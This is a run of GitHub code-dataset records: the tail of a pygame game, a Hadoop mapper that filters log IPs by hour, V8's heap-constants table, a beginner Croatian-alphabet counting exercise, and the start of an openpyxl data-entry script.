0\r\n\r\n screen.blit(title_font, title_rect)\r\n screen.blit(msg, msg_rect)\r\n\r\n score_msg = text_font.render(f\"Your score: {score}\", False,\"green\")\r\n score_rect = score_msg.get_rect(center=(400,330))\r\n \r\n\r\n if score == 0: screen.blit(msg,msg_rect)\r\n else: screen.blit(score_msg,score_rect)\r\n \r\n \r\n #Draw all elements and update everything.\r\n pygame.display.update()\r\n #Calling the clock object to run 60fps.\r\n clock.tick(60)\r\n\r\n\r\n#RESOURCE\r\n\"\"\"\r\nKEYBOARD INPUT CONTROLS USING \"pygame.key\"\r\nkey = pygame.key.get_pressed()\r\nif key[pygame.K_SPACE]:\r\n\"\"\" \r\n#COLLISION\r\n#Using colliderect to check for collision.\r\n#if player_rect.colliderect(snail_rect):\r\n# print(\"collision\")\r\n\"\"\"\r\nmouse_coor = pygame.mouse.get_pos()\r\nif player_rect.collidepoint(mouse_coor):\r\nprint(pygame.mouse.get_pressed()) \r\n\"\"\"\r\n\r\n# pygame.draw.rect(screen, \"#c0e8ec\", score_rect)\r\n # pygame.draw.rect(screen, \"#c0e8ec\", score_rect, 10)\r\n #pygame.draw.ellipse(screen,\"Brown\", pygame.Rect(50,200,100,100))\r\n # screen.blit(score_surf, score_rect)\r\n\r\n#screen.blit(player_surf(80, 200))\r\n #snail_x -= 4\r\n #snail_rect.left -= 4 #Updated version - using rect instead of image surface.\r\n #Snail movement restrictions.\r\n #if snail_x < 0:\r\n #snail_x = 800 ","repo_name":"calvin-hello/pygame-2","sub_path":"Pygame 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35143465221","text":"import re\nimport sys\n\n# pat = re.compile('(?P<ip>\d+.\d+.\d+.\d+').*?\"\w+ (?P.*?) ')\n# pat = re.compile(\"(?P<ip>\d+\d+.\d+.\d+).*?\d{4}:(?P<hour>\d{2}).*? \")\n# ?P<ip> creates a match group named ip\nrange = sys.argv[1]\n#print(\"range is\", range)\nlow, high = range.split(\"-\")\n\npat = re.compile('(?P<ip>\d+.\d+.\d+.\d+).*?\d{4}:(?P<hour>\d{2}):\d{2}.*? 
')\n\n\n\nfor line in sys.stdin:\n match = pat.search(line)\n if match:\n hour = match.group('hour')\n if int(hour) >= int(low) and int(hour) < int(high):\n print(\"[\" + hour + \":00\" + \"]\" + match.group('ip') + \"\\t\" + \"1\")\n\n\n","repo_name":"aditigode/Hadoop-searchIPaddresses","sub_path":"part2/part2a/mapper_chain1.py","file_name":"mapper_chain1.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16483989704","text":"INSTANCE_TYPES = {\n 0: \"INTERNALIZED_STRING_TYPE\",\n 2: \"EXTERNAL_INTERNALIZED_STRING_TYPE\",\n 8: \"ONE_BYTE_INTERNALIZED_STRING_TYPE\",\n 10: \"EXTERNAL_ONE_BYTE_INTERNALIZED_STRING_TYPE\",\n 18: \"EXTERNAL_INTERNALIZED_STRING_WITH_ONE_BYTE_DATA_TYPE\",\n 34: \"UNCACHED_EXTERNAL_INTERNALIZED_STRING_TYPE\",\n 42: \"UNCACHED_EXTERNAL_ONE_BYTE_INTERNALIZED_STRING_TYPE\",\n 50: \"UNCACHED_EXTERNAL_INTERNALIZED_STRING_WITH_ONE_BYTE_DATA_TYPE\",\n 64: \"STRING_TYPE\",\n 65: \"CONS_STRING_TYPE\",\n 66: \"EXTERNAL_STRING_TYPE\",\n 67: \"SLICED_STRING_TYPE\",\n 69: \"THIN_STRING_TYPE\",\n 72: \"ONE_BYTE_STRING_TYPE\",\n 73: \"CONS_ONE_BYTE_STRING_TYPE\",\n 74: \"EXTERNAL_ONE_BYTE_STRING_TYPE\",\n 75: \"SLICED_ONE_BYTE_STRING_TYPE\",\n 77: \"THIN_ONE_BYTE_STRING_TYPE\",\n 82: \"EXTERNAL_STRING_WITH_ONE_BYTE_DATA_TYPE\",\n 98: \"UNCACHED_EXTERNAL_STRING_TYPE\",\n 106: \"UNCACHED_EXTERNAL_ONE_BYTE_STRING_TYPE\",\n 114: \"UNCACHED_EXTERNAL_STRING_WITH_ONE_BYTE_DATA_TYPE\",\n 128: \"SYMBOL_TYPE\",\n 129: \"HEAP_NUMBER_TYPE\",\n 130: \"BIGINT_TYPE\",\n 131: \"ODDBALL_TYPE\",\n 132: \"MAP_TYPE\",\n 133: \"CODE_TYPE\",\n 134: \"MUTABLE_HEAP_NUMBER_TYPE\",\n 135: \"FOREIGN_TYPE\",\n 136: \"BYTE_ARRAY_TYPE\",\n 137: \"BYTECODE_ARRAY_TYPE\",\n 138: \"FREE_SPACE_TYPE\",\n 139: \"FIXED_INT8_ARRAY_TYPE\",\n 140: \"FIXED_UINT8_ARRAY_TYPE\",\n 141: \"FIXED_INT16_ARRAY_TYPE\",\n 142: \"FIXED_UINT16_ARRAY_TYPE\",\n 143: \"FIXED_INT32_ARRAY_TYPE\",\n 144: \"FIXED_UINT32_ARRAY_TYPE\",\n 145: \"FIXED_FLOAT32_ARRAY_TYPE\",\n 146: \"FIXED_FLOAT64_ARRAY_TYPE\",\n 147: \"FIXED_UINT8_CLAMPED_ARRAY_TYPE\",\n 148: \"FIXED_BIGINT64_ARRAY_TYPE\",\n 149: \"FIXED_BIGUINT64_ARRAY_TYPE\",\n 150: \"FIXED_DOUBLE_ARRAY_TYPE\",\n 151: \"FEEDBACK_METADATA_TYPE\",\n 152: \"FILLER_TYPE\",\n 153: \"ACCESS_CHECK_INFO_TYPE\",\n 154: \"ACCESSOR_INFO_TYPE\",\n 155: \"ACCESSOR_PAIR_TYPE\",\n 156: \"ALIASED_ARGUMENTS_ENTRY_TYPE\",\n 157: \"ALLOCATION_MEMENTO_TYPE\",\n 158: \"ASYNC_GENERATOR_REQUEST_TYPE\",\n 159: \"DEBUG_INFO_TYPE\",\n 160: \"FUNCTION_TEMPLATE_INFO_TYPE\",\n 161: \"INTERCEPTOR_INFO_TYPE\",\n 162: \"INTERPRETER_DATA_TYPE\",\n 163: \"MODULE_INFO_ENTRY_TYPE\",\n 164: \"MODULE_TYPE\",\n 165: \"OBJECT_TEMPLATE_INFO_TYPE\",\n 166: \"PROMISE_CAPABILITY_TYPE\",\n 167: \"PROMISE_REACTION_TYPE\",\n 168: \"PROTOTYPE_INFO_TYPE\",\n 169: \"SCRIPT_TYPE\",\n 170: \"STACK_FRAME_INFO_TYPE\",\n 171: \"TUPLE2_TYPE\",\n 172: \"TUPLE3_TYPE\",\n 173: \"ARRAY_BOILERPLATE_DESCRIPTION_TYPE\",\n 174: \"WASM_DEBUG_INFO_TYPE\",\n 175: \"WASM_EXPORTED_FUNCTION_DATA_TYPE\",\n 176: \"CALLABLE_TASK_TYPE\",\n 177: \"CALLBACK_TASK_TYPE\",\n 178: \"PROMISE_FULFILL_REACTION_JOB_TASK_TYPE\",\n 179: \"PROMISE_REJECT_REACTION_JOB_TASK_TYPE\",\n 180: \"PROMISE_RESOLVE_THENABLE_JOB_TASK_TYPE\",\n 181: \"MICROTASK_QUEUE_TYPE\",\n 182: \"ALLOCATION_SITE_TYPE\",\n 183: \"FIXED_ARRAY_TYPE\",\n 184: \"OBJECT_BOILERPLATE_DESCRIPTION_TYPE\",\n 185: \"HASH_TABLE_TYPE\",\n 186: \"ORDERED_HASH_MAP_TYPE\",\n 187: \"ORDERED_HASH_SET_TYPE\",\n 188: 
\"NAME_DICTIONARY_TYPE\",\n 189: \"GLOBAL_DICTIONARY_TYPE\",\n 190: \"NUMBER_DICTIONARY_TYPE\",\n 191: \"SIMPLE_NUMBER_DICTIONARY_TYPE\",\n 192: \"STRING_TABLE_TYPE\",\n 193: \"EPHEMERON_HASH_TABLE_TYPE\",\n 194: \"SCOPE_INFO_TYPE\",\n 195: \"SCRIPT_CONTEXT_TABLE_TYPE\",\n 196: \"AWAIT_CONTEXT_TYPE\",\n 197: \"BLOCK_CONTEXT_TYPE\",\n 198: \"CATCH_CONTEXT_TYPE\",\n 199: \"DEBUG_EVALUATE_CONTEXT_TYPE\",\n 200: \"EVAL_CONTEXT_TYPE\",\n 201: \"FUNCTION_CONTEXT_TYPE\",\n 202: \"MODULE_CONTEXT_TYPE\",\n 203: \"NATIVE_CONTEXT_TYPE\",\n 204: \"SCRIPT_CONTEXT_TYPE\",\n 205: \"WITH_CONTEXT_TYPE\",\n 206: \"WEAK_FIXED_ARRAY_TYPE\",\n 207: \"DESCRIPTOR_ARRAY_TYPE\",\n 208: \"TRANSITION_ARRAY_TYPE\",\n 209: \"CALL_HANDLER_INFO_TYPE\",\n 210: \"CELL_TYPE\",\n 211: \"CODE_DATA_CONTAINER_TYPE\",\n 212: \"FEEDBACK_CELL_TYPE\",\n 213: \"FEEDBACK_VECTOR_TYPE\",\n 214: \"LOAD_HANDLER_TYPE\",\n 215: \"PRE_PARSED_SCOPE_DATA_TYPE\",\n 216: \"PROPERTY_ARRAY_TYPE\",\n 217: \"PROPERTY_CELL_TYPE\",\n 218: \"SHARED_FUNCTION_INFO_TYPE\",\n 219: \"SMALL_ORDERED_HASH_MAP_TYPE\",\n 220: \"SMALL_ORDERED_HASH_SET_TYPE\",\n 221: \"STORE_HANDLER_TYPE\",\n 222: \"UNCOMPILED_DATA_WITHOUT_PRE_PARSED_SCOPE_TYPE\",\n 223: \"UNCOMPILED_DATA_WITH_PRE_PARSED_SCOPE_TYPE\",\n 224: \"WEAK_ARRAY_LIST_TYPE\",\n 1024: \"JS_PROXY_TYPE\",\n 1025: \"JS_GLOBAL_OBJECT_TYPE\",\n 1026: \"JS_GLOBAL_PROXY_TYPE\",\n 1027: \"JS_MODULE_NAMESPACE_TYPE\",\n 1040: \"JS_SPECIAL_API_OBJECT_TYPE\",\n 1041: \"JS_VALUE_TYPE\",\n 1056: \"JS_API_OBJECT_TYPE\",\n 1057: \"JS_OBJECT_TYPE\",\n 1058: \"JS_ARGUMENTS_TYPE\",\n 1059: \"JS_ARRAY_BUFFER_TYPE\",\n 1060: \"JS_ARRAY_ITERATOR_TYPE\",\n 1061: \"JS_ARRAY_TYPE\",\n 1062: \"JS_ASYNC_FROM_SYNC_ITERATOR_TYPE\",\n 1063: \"JS_ASYNC_GENERATOR_OBJECT_TYPE\",\n 1064: \"JS_CONTEXT_EXTENSION_OBJECT_TYPE\",\n 1065: \"JS_DATE_TYPE\",\n 1066: \"JS_ERROR_TYPE\",\n 1067: \"JS_GENERATOR_OBJECT_TYPE\",\n 1068: \"JS_MAP_TYPE\",\n 1069: \"JS_MAP_KEY_ITERATOR_TYPE\",\n 1070: \"JS_MAP_KEY_VALUE_ITERATOR_TYPE\",\n 1071: \"JS_MAP_VALUE_ITERATOR_TYPE\",\n 1072: \"JS_MESSAGE_OBJECT_TYPE\",\n 1073: \"JS_PROMISE_TYPE\",\n 1074: \"JS_REGEXP_TYPE\",\n 1075: \"JS_REGEXP_STRING_ITERATOR_TYPE\",\n 1076: \"JS_SET_TYPE\",\n 1077: \"JS_SET_KEY_VALUE_ITERATOR_TYPE\",\n 1078: \"JS_SET_VALUE_ITERATOR_TYPE\",\n 1079: \"JS_STRING_ITERATOR_TYPE\",\n 1080: \"JS_WEAK_MAP_TYPE\",\n 1081: \"JS_WEAK_SET_TYPE\",\n 1082: \"JS_TYPED_ARRAY_TYPE\",\n 1083: \"JS_DATA_VIEW_TYPE\",\n 1084: \"JS_INTL_V8_BREAK_ITERATOR_TYPE\",\n 1085: \"JS_INTL_COLLATOR_TYPE\",\n 1086: \"JS_INTL_DATE_TIME_FORMAT_TYPE\",\n 1087: \"JS_INTL_LIST_FORMAT_TYPE\",\n 1088: \"JS_INTL_LOCALE_TYPE\",\n 1089: \"JS_INTL_NUMBER_FORMAT_TYPE\",\n 1090: \"JS_INTL_PLURAL_RULES_TYPE\",\n 1091: \"JS_INTL_RELATIVE_TIME_FORMAT_TYPE\",\n 1092: \"JS_INTL_SEGMENTER_TYPE\",\n 1093: \"WASM_EXCEPTION_TYPE\",\n 1094: \"WASM_GLOBAL_TYPE\",\n 1095: \"WASM_INSTANCE_TYPE\",\n 1096: \"WASM_MEMORY_TYPE\",\n 1097: \"WASM_MODULE_TYPE\",\n 1098: \"WASM_TABLE_TYPE\",\n 1099: \"JS_BOUND_FUNCTION_TYPE\",\n 1100: \"JS_FUNCTION_TYPE\",\n}\n\n# List of known V8 maps.\nKNOWN_MAPS = {\n (\"RO_SPACE\", 0x02201): (138, \"FreeSpaceMap\"),\n (\"RO_SPACE\", 0x02251): (132, \"MetaMap\"),\n (\"RO_SPACE\", 0x022d1): (131, \"NullMap\"),\n (\"RO_SPACE\", 0x02341): (207, \"DescriptorArrayMap\"),\n (\"RO_SPACE\", 0x023a1): (206, \"WeakFixedArrayMap\"),\n (\"RO_SPACE\", 0x023f1): (152, \"OnePointerFillerMap\"),\n (\"RO_SPACE\", 0x02441): (152, \"TwoPointerFillerMap\"),\n (\"RO_SPACE\", 0x024c1): (131, \"UninitializedMap\"),\n 
(\"RO_SPACE\", 0x02531): (8, \"OneByteInternalizedStringMap\"),\n (\"RO_SPACE\", 0x025d1): (131, \"UndefinedMap\"),\n (\"RO_SPACE\", 0x02631): (129, \"HeapNumberMap\"),\n (\"RO_SPACE\", 0x026b1): (131, \"TheHoleMap\"),\n (\"RO_SPACE\", 0x02759): (131, \"BooleanMap\"),\n (\"RO_SPACE\", 0x02831): (136, \"ByteArrayMap\"),\n (\"RO_SPACE\", 0x02881): (183, \"FixedArrayMap\"),\n (\"RO_SPACE\", 0x028d1): (183, \"FixedCOWArrayMap\"),\n (\"RO_SPACE\", 0x02921): (185, \"HashTableMap\"),\n (\"RO_SPACE\", 0x02971): (128, \"SymbolMap\"),\n (\"RO_SPACE\", 0x029c1): (72, \"OneByteStringMap\"),\n (\"RO_SPACE\", 0x02a11): (194, \"ScopeInfoMap\"),\n (\"RO_SPACE\", 0x02a61): (218, \"SharedFunctionInfoMap\"),\n (\"RO_SPACE\", 0x02ab1): (133, \"CodeMap\"),\n (\"RO_SPACE\", 0x02b01): (201, \"FunctionContextMap\"),\n (\"RO_SPACE\", 0x02b51): (210, \"CellMap\"),\n (\"RO_SPACE\", 0x02ba1): (217, \"GlobalPropertyCellMap\"),\n (\"RO_SPACE\", 0x02bf1): (135, \"ForeignMap\"),\n (\"RO_SPACE\", 0x02c41): (208, \"TransitionArrayMap\"),\n (\"RO_SPACE\", 0x02c91): (213, \"FeedbackVectorMap\"),\n (\"RO_SPACE\", 0x02d31): (131, \"ArgumentsMarkerMap\"),\n (\"RO_SPACE\", 0x02dd1): (131, \"ExceptionMap\"),\n (\"RO_SPACE\", 0x02e71): (131, \"TerminationExceptionMap\"),\n (\"RO_SPACE\", 0x02f19): (131, \"OptimizedOutMap\"),\n (\"RO_SPACE\", 0x02fb9): (131, \"StaleRegisterMap\"),\n (\"RO_SPACE\", 0x03029): (203, \"NativeContextMap\"),\n (\"RO_SPACE\", 0x03079): (202, \"ModuleContextMap\"),\n (\"RO_SPACE\", 0x030c9): (200, \"EvalContextMap\"),\n (\"RO_SPACE\", 0x03119): (204, \"ScriptContextMap\"),\n (\"RO_SPACE\", 0x03169): (196, \"AwaitContextMap\"),\n (\"RO_SPACE\", 0x031b9): (197, \"BlockContextMap\"),\n (\"RO_SPACE\", 0x03209): (198, \"CatchContextMap\"),\n (\"RO_SPACE\", 0x03259): (205, \"WithContextMap\"),\n (\"RO_SPACE\", 0x032a9): (199, \"DebugEvaluateContextMap\"),\n (\"RO_SPACE\", 0x032f9): (195, \"ScriptContextTableMap\"),\n (\"RO_SPACE\", 0x03349): (151, \"FeedbackMetadataArrayMap\"),\n (\"RO_SPACE\", 0x03399): (183, \"ArrayListMap\"),\n (\"RO_SPACE\", 0x033e9): (130, \"BigIntMap\"),\n (\"RO_SPACE\", 0x03439): (184, \"ObjectBoilerplateDescriptionMap\"),\n (\"RO_SPACE\", 0x03489): (137, \"BytecodeArrayMap\"),\n (\"RO_SPACE\", 0x034d9): (211, \"CodeDataContainerMap\"),\n (\"RO_SPACE\", 0x03529): (150, \"FixedDoubleArrayMap\"),\n (\"RO_SPACE\", 0x03579): (189, \"GlobalDictionaryMap\"),\n (\"RO_SPACE\", 0x035c9): (212, \"ManyClosuresCellMap\"),\n (\"RO_SPACE\", 0x03619): (183, \"ModuleInfoMap\"),\n (\"RO_SPACE\", 0x03669): (134, \"MutableHeapNumberMap\"),\n (\"RO_SPACE\", 0x036b9): (188, \"NameDictionaryMap\"),\n (\"RO_SPACE\", 0x03709): (212, \"NoClosuresCellMap\"),\n (\"RO_SPACE\", 0x03759): (190, \"NumberDictionaryMap\"),\n (\"RO_SPACE\", 0x037a9): (212, \"OneClosureCellMap\"),\n (\"RO_SPACE\", 0x037f9): (186, \"OrderedHashMapMap\"),\n (\"RO_SPACE\", 0x03849): (187, \"OrderedHashSetMap\"),\n (\"RO_SPACE\", 0x03899): (215, \"PreParsedScopeDataMap\"),\n (\"RO_SPACE\", 0x038e9): (216, \"PropertyArrayMap\"),\n (\"RO_SPACE\", 0x03939): (209, \"SideEffectCallHandlerInfoMap\"),\n (\"RO_SPACE\", 0x03989): (209, \"SideEffectFreeCallHandlerInfoMap\"),\n (\"RO_SPACE\", 0x039d9): (209, \"NextCallSideEffectFreeCallHandlerInfoMap\"),\n (\"RO_SPACE\", 0x03a29): (191, \"SimpleNumberDictionaryMap\"),\n (\"RO_SPACE\", 0x03a79): (183, \"SloppyArgumentsElementsMap\"),\n (\"RO_SPACE\", 0x03ac9): (219, \"SmallOrderedHashMapMap\"),\n (\"RO_SPACE\", 0x03b19): (220, \"SmallOrderedHashSetMap\"),\n (\"RO_SPACE\", 0x03b69): (192, 
\"StringTableMap\"),\n (\"RO_SPACE\", 0x03bb9): (222, \"UncompiledDataWithoutPreParsedScopeMap\"),\n (\"RO_SPACE\", 0x03c09): (223, \"UncompiledDataWithPreParsedScopeMap\"),\n (\"RO_SPACE\", 0x03c59): (224, \"WeakArrayListMap\"),\n (\"RO_SPACE\", 0x03ca9): (193, \"EphemeronHashTableMap\"),\n (\"RO_SPACE\", 0x03cf9): (106, \"NativeSourceStringMap\"),\n (\"RO_SPACE\", 0x03d49): (64, \"StringMap\"),\n (\"RO_SPACE\", 0x03d99): (73, \"ConsOneByteStringMap\"),\n (\"RO_SPACE\", 0x03de9): (65, \"ConsStringMap\"),\n (\"RO_SPACE\", 0x03e39): (77, \"ThinOneByteStringMap\"),\n (\"RO_SPACE\", 0x03e89): (69, \"ThinStringMap\"),\n (\"RO_SPACE\", 0x03ed9): (67, \"SlicedStringMap\"),\n (\"RO_SPACE\", 0x03f29): (75, \"SlicedOneByteStringMap\"),\n (\"RO_SPACE\", 0x03f79): (66, \"ExternalStringMap\"),\n (\"RO_SPACE\", 0x03fc9): (82, \"ExternalStringWithOneByteDataMap\"),\n (\"RO_SPACE\", 0x04019): (74, \"ExternalOneByteStringMap\"),\n (\"RO_SPACE\", 0x04069): (98, \"UncachedExternalStringMap\"),\n (\"RO_SPACE\", 0x040b9): (114, \"UncachedExternalStringWithOneByteDataMap\"),\n (\"RO_SPACE\", 0x04109): (0, \"InternalizedStringMap\"),\n (\"RO_SPACE\", 0x04159): (2, \"ExternalInternalizedStringMap\"),\n (\"RO_SPACE\", 0x041a9): (18, \"ExternalInternalizedStringWithOneByteDataMap\"),\n (\"RO_SPACE\", 0x041f9): (10, \"ExternalOneByteInternalizedStringMap\"),\n (\"RO_SPACE\", 0x04249): (34, \"UncachedExternalInternalizedStringMap\"),\n (\"RO_SPACE\", 0x04299): (50, \"UncachedExternalInternalizedStringWithOneByteDataMap\"),\n (\"RO_SPACE\", 0x042e9): (42, \"UncachedExternalOneByteInternalizedStringMap\"),\n (\"RO_SPACE\", 0x04339): (106, \"UncachedExternalOneByteStringMap\"),\n (\"RO_SPACE\", 0x04389): (140, \"FixedUint8ArrayMap\"),\n (\"RO_SPACE\", 0x043d9): (139, \"FixedInt8ArrayMap\"),\n (\"RO_SPACE\", 0x04429): (142, \"FixedUint16ArrayMap\"),\n (\"RO_SPACE\", 0x04479): (141, \"FixedInt16ArrayMap\"),\n (\"RO_SPACE\", 0x044c9): (144, \"FixedUint32ArrayMap\"),\n (\"RO_SPACE\", 0x04519): (143, \"FixedInt32ArrayMap\"),\n (\"RO_SPACE\", 0x04569): (145, \"FixedFloat32ArrayMap\"),\n (\"RO_SPACE\", 0x045b9): (146, \"FixedFloat64ArrayMap\"),\n (\"RO_SPACE\", 0x04609): (147, \"FixedUint8ClampedArrayMap\"),\n (\"RO_SPACE\", 0x04659): (149, \"FixedBigUint64ArrayMap\"),\n (\"RO_SPACE\", 0x046a9): (148, \"FixedBigInt64ArrayMap\"),\n (\"RO_SPACE\", 0x046f9): (131, \"SelfReferenceMarkerMap\"),\n (\"RO_SPACE\", 0x04761): (171, \"Tuple2Map\"),\n (\"RO_SPACE\", 0x04801): (173, \"ArrayBoilerplateDescriptionMap\"),\n (\"RO_SPACE\", 0x04af1): (161, \"InterceptorInfoMap\"),\n (\"RO_SPACE\", 0x06ea9): (153, \"AccessCheckInfoMap\"),\n (\"RO_SPACE\", 0x06ef9): (154, \"AccessorInfoMap\"),\n (\"RO_SPACE\", 0x06f49): (155, \"AccessorPairMap\"),\n (\"RO_SPACE\", 0x06f99): (156, \"AliasedArgumentsEntryMap\"),\n (\"RO_SPACE\", 0x06fe9): (157, \"AllocationMementoMap\"),\n (\"RO_SPACE\", 0x07039): (158, \"AsyncGeneratorRequestMap\"),\n (\"RO_SPACE\", 0x07089): (159, \"DebugInfoMap\"),\n (\"RO_SPACE\", 0x070d9): (160, \"FunctionTemplateInfoMap\"),\n (\"RO_SPACE\", 0x07129): (162, \"InterpreterDataMap\"),\n (\"RO_SPACE\", 0x07179): (163, \"ModuleInfoEntryMap\"),\n (\"RO_SPACE\", 0x071c9): (164, \"ModuleMap\"),\n (\"RO_SPACE\", 0x07219): (165, \"ObjectTemplateInfoMap\"),\n (\"RO_SPACE\", 0x07269): (166, \"PromiseCapabilityMap\"),\n (\"RO_SPACE\", 0x072b9): (167, \"PromiseReactionMap\"),\n (\"RO_SPACE\", 0x07309): (168, \"PrototypeInfoMap\"),\n (\"RO_SPACE\", 0x07359): (169, \"ScriptMap\"),\n (\"RO_SPACE\", 0x073a9): (170, \"StackFrameInfoMap\"),\n 
(\"RO_SPACE\", 0x073f9): (172, \"Tuple3Map\"),\n (\"RO_SPACE\", 0x07449): (174, \"WasmDebugInfoMap\"),\n (\"RO_SPACE\", 0x07499): (175, \"WasmExportedFunctionDataMap\"),\n (\"RO_SPACE\", 0x074e9): (176, \"CallableTaskMap\"),\n (\"RO_SPACE\", 0x07539): (177, \"CallbackTaskMap\"),\n (\"RO_SPACE\", 0x07589): (178, \"PromiseFulfillReactionJobTaskMap\"),\n (\"RO_SPACE\", 0x075d9): (179, \"PromiseRejectReactionJobTaskMap\"),\n (\"RO_SPACE\", 0x07629): (180, \"PromiseResolveThenableJobTaskMap\"),\n (\"RO_SPACE\", 0x07679): (181, \"MicrotaskQueueMap\"),\n (\"RO_SPACE\", 0x076c9): (182, \"AllocationSiteWithWeakNextMap\"),\n (\"RO_SPACE\", 0x07719): (182, \"AllocationSiteWithoutWeakNextMap\"),\n (\"RO_SPACE\", 0x07769): (214, \"LoadHandler1Map\"),\n (\"RO_SPACE\", 0x077b9): (214, \"LoadHandler2Map\"),\n (\"RO_SPACE\", 0x07809): (214, \"LoadHandler3Map\"),\n (\"RO_SPACE\", 0x07859): (221, \"StoreHandler0Map\"),\n (\"RO_SPACE\", 0x078a9): (221, \"StoreHandler1Map\"),\n (\"RO_SPACE\", 0x078f9): (221, \"StoreHandler2Map\"),\n (\"RO_SPACE\", 0x07949): (221, \"StoreHandler3Map\"),\n (\"MAP_SPACE\", 0x02201): (1057, \"ExternalMap\"),\n (\"MAP_SPACE\", 0x02251): (1072, \"JSMessageObjectMap\"),\n}\n\n# List of known V8 objects.\nKNOWN_OBJECTS = {\n (\"RO_SPACE\", 0x022a1): \"NullValue\",\n (\"RO_SPACE\", 0x02321): \"EmptyDescriptorArray\",\n (\"RO_SPACE\", 0x02491): \"UninitializedValue\",\n (\"RO_SPACE\", 0x025a1): \"UndefinedValue\",\n (\"RO_SPACE\", 0x02621): \"NanValue\",\n (\"RO_SPACE\", 0x02681): \"TheHoleValue\",\n (\"RO_SPACE\", 0x02719): \"HoleNanValue\",\n (\"RO_SPACE\", 0x02729): \"TrueValue\",\n (\"RO_SPACE\", 0x027d9): \"FalseValue\",\n (\"RO_SPACE\", 0x02821): \"empty_string\",\n (\"RO_SPACE\", 0x02ce1): \"EmptyScopeInfo\",\n (\"RO_SPACE\", 0x02cf1): \"EmptyFixedArray\",\n (\"RO_SPACE\", 0x02d01): \"ArgumentsMarker\",\n (\"RO_SPACE\", 0x02da1): \"Exception\",\n (\"RO_SPACE\", 0x02e41): \"TerminationException\",\n (\"RO_SPACE\", 0x02ee9): \"OptimizedOut\",\n (\"RO_SPACE\", 0x02f89): \"StaleRegister\",\n (\"RO_SPACE\", 0x047c1): \"EmptyByteArray\",\n (\"RO_SPACE\", 0x04851): \"EmptyFixedUint8Array\",\n (\"RO_SPACE\", 0x04871): \"EmptyFixedInt8Array\",\n (\"RO_SPACE\", 0x04891): \"EmptyFixedUint16Array\",\n (\"RO_SPACE\", 0x048b1): \"EmptyFixedInt16Array\",\n (\"RO_SPACE\", 0x048d1): \"EmptyFixedUint32Array\",\n (\"RO_SPACE\", 0x048f1): \"EmptyFixedInt32Array\",\n (\"RO_SPACE\", 0x04911): \"EmptyFixedFloat32Array\",\n (\"RO_SPACE\", 0x04931): \"EmptyFixedFloat64Array\",\n (\"RO_SPACE\", 0x04951): \"EmptyFixedUint8ClampedArray\",\n (\"RO_SPACE\", 0x049b1): \"EmptySloppyArgumentsElements\",\n (\"RO_SPACE\", 0x049d1): \"EmptySlowElementDictionary\",\n (\"RO_SPACE\", 0x04a19): \"EmptyOrderedHashMap\",\n (\"RO_SPACE\", 0x04a41): \"EmptyOrderedHashSet\",\n (\"RO_SPACE\", 0x04a79): \"EmptyPropertyCell\",\n (\"RO_SPACE\", 0x04b59): \"InfinityValue\",\n (\"RO_SPACE\", 0x04b69): \"MinusZeroValue\",\n (\"RO_SPACE\", 0x04b79): \"MinusInfinityValue\",\n (\"RO_SPACE\", 0x04b89): \"SelfReferenceMarker\",\n (\"OLD_SPACE\", 0x02211): \"EmptyScript\",\n (\"OLD_SPACE\", 0x02291): \"ManyClosuresCell\",\n (\"OLD_SPACE\", 0x022b1): \"NoElementsProtector\",\n (\"OLD_SPACE\", 0x022d9): \"IsConcatSpreadableProtector\",\n (\"OLD_SPACE\", 0x022e9): \"ArraySpeciesProtector\",\n (\"OLD_SPACE\", 0x02311): \"TypedArraySpeciesProtector\",\n (\"OLD_SPACE\", 0x02339): \"PromiseSpeciesProtector\",\n (\"OLD_SPACE\", 0x02361): \"StringLengthProtector\",\n (\"OLD_SPACE\", 0x02371): \"ArrayIteratorProtector\",\n (\"OLD_SPACE\", 
0x02399): \"ArrayBufferNeuteringProtector\",\n (\"OLD_SPACE\", 0x02421): \"StringIteratorProtector\",\n}\n\n# List of known V8 Frame Markers.\nFRAME_MARKERS = (\n \"ENTRY\",\n \"CONSTRUCT_ENTRY\",\n \"EXIT\",\n \"OPTIMIZED\",\n \"WASM_COMPILED\",\n \"WASM_TO_JS\",\n \"JS_TO_WASM\",\n \"WASM_INTERPRETER_ENTRY\",\n \"C_WASM_ENTRY\",\n \"WASM_COMPILE_LAZY\",\n \"INTERPRETED\",\n \"STUB\",\n \"BUILTIN_CONTINUATION\",\n \"JAVA_SCRIPT_BUILTIN_CONTINUATION\",\n \"JAVA_SCRIPT_BUILTIN_CONTINUATION_WITH_CATCH\",\n \"INTERNAL\",\n \"CONSTRUCT\",\n \"ARGUMENTS_ADAPTOR\",\n \"BUILTIN\",\n \"BUILTIN_EXIT\",\n \"NATIVE\",\n)\n\n# This set of constants is generated from a shipping build.\n","repo_name":"ofrobots/no-bazel","sub_path":"third_party/v8/tools/v8heapconst.py","file_name":"v8heapconst.py","file_ext":"py","file_size_in_byte":16702,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"3346129392","text":"# \"변수 설정\"\n# \"판별 할 수 있는 set 구성\"\n\ncabc = {'c=', 'c-', 'dz=', 'd-', 'lj', 'nj', 's=', 'z='}\n\n\nsr = str(input())\n\ndef word(sr) :\n word_cnt = 0\n for i in range(0,len(sr)):\n sr_list= list(sr)\n if sr_list[i]==\"d\" or \"c\" or \"l\" or \"n\" or \"s\" or \"z\":\n if {sr_list[i]+sr_list[i+1]+sr_list[i+2]}.isdisjoint(cabc):\n word_cnt += 1\n elif {sr_list[i]+sr_list[i+1]}.isdisjoint(cabc):\n word_cnt += 1\n else:\n word_cnt += 1\n return word_cnt\n\nprint(word(sr))\n\n\"\"\"\nsr = input()\n\nfor i in cabc:\n sr = sr.replace(i,'*')\n\nprint(len(sr))\n\"\"\"","repo_name":"kimyoo04/baekjoon-algorithm-study","sub_path":"Python/1. 실버/5/2941번 크로아티아 알파벳.py","file_name":"2941번 크로아티아 알파벳.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33856028531","text":"from openpyxl import load_workbook\nimport easygui\n\nworkbook_name = 'List.xlsx'\nwb = load_workbook(workbook_name)\npage = wb.active\n\n# New data to write:\ndef dataEntry():\n fieldNames = ['Date','Job ID','Job Title','Job Description','Company Name','Client Name']\n fieldVals = easygui.multenterbox('Enter the 